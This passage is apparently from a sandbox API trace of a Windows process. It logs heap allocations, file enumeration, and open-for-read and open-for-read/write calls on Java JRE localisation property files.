lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0095.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0095.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0095.081] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.081] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.081] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xfe8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="messages_zh_CN.properties", cAlternateFileName="ME40CD~1.PRO")) returned 1 [0095.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0095.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0095.081] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0095.081] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0095.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0095.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0095.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0095.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0095.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0095.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0095.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0095.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0095.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0095.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0095.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0095.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0095.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0095.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0095.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0095.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0095.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0095.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aa88 [0095.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0095.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0095.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aeb0 [0095.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0095.082] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.082] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.082] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.082] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0095.082] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0095.082] AreFileApisANSI () returned 1 [0095.082] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_CN.properties", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_CN.properties", lpUsedDefaultChar=0x0) returned 72 [0095.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0095.082] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.082] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0095.082] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0095.083] AreFileApisANSI () returned 1 [0095.083] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0095.083] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a958 [0095.083] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8a958, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_CN.properties") returned 72 [0095.083] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_CN.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_cn.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0095.083] GetFileType (hFile=0x368) returned 0x1 [0095.083] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a958 | out: hHeap=0x20000) returned 1 [0095.083] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0095.083] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0095.083] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0095.084] CloseHandle (hObject=0x368) returned 1 [0095.084] AreFileApisANSI () returned 1 [0095.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0095.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0095.084] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8a5c8, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_CN.properties") returned 72 [0095.084] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_CN.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_cn.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0095.084] GetFileType (hFile=0x368) returned 0x1 [0095.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0095.084] CloseHandle (hObject=0x368) returned 1 [0095.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.084] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.084] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0095.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0095.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0095.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0095.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0095.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0095.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0095.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0095.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0095.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0095.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0095.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0095.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0095.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0095.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0095.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0095.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0095.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0095.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0095.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.085] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0095.085] AreFileApisANSI () returned 1 [0095.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0095.085] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a238 [0095.085] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8a238, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_CN.properties") returned 72 [0095.086] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_CN.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_cn.properties"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xfe8)) returned 1 [0095.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0095.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0095.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0095.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0095.086] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.086] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.086] FindNextFileW (in: hFindFile=0x78750, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xea8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="messages_zh_HK.properties", cAlternateFileName="MEB8B5~1.PRO")) returned 1 [0095.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0095.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68c70 [0095.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0095.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0095.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0095.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0095.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0095.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0095.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68c70 | out: hHeap=0x20000) returned 1 [0095.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0095.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0095.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0095.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0095.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0095.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0095.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0095.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0095.086] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0095.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0095.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0095.086] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0095.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0095.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71550 | out: hHeap=0x20000) returned 1 [0095.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0095.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b110 [0095.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0095.087] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.087] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.087] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.087] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0095.087] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0095.087] AreFileApisANSI () returned 1 [0095.087] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_HK.properties", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_HK.properties", lpUsedDefaultChar=0x0) returned 72 [0095.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0095.087] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.087] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0095.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0095.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0095.087] AreFileApisANSI () returned 1 [0095.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0095.087] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a2d0 [0095.087] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8a2d0, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_HK.properties") returned 72 [0095.088] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_HK.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_hk.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0095.088] GetFileType (hFile=0x368) returned 0x1 [0095.088] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0095.089] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0095.089] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0095.089] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0095.089] CloseHandle (hObject=0x368) returned 1 [0095.089] AreFileApisANSI () returned 1 [0095.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 72 [0095.089] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a660 [0095.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x8a660, cchWideChar=72 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_HK.properties") returned 72 [0095.089] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_zh_HK.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_zh_hk.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0095.089] GetFileType (hFile=0x368) returned 0x1 [0095.089] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0095.090] CloseHandle (hObject=0x368) returned 1 [0095.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0095.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0095.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0095.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0095.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0095.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0095.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0095.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0095.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0095.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0095.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0095.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0095.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0095.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0095.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0095.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0095.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0095.090] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0095.090] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0095.090] RtlAllocateHeap (HeapHandle=0x20000, 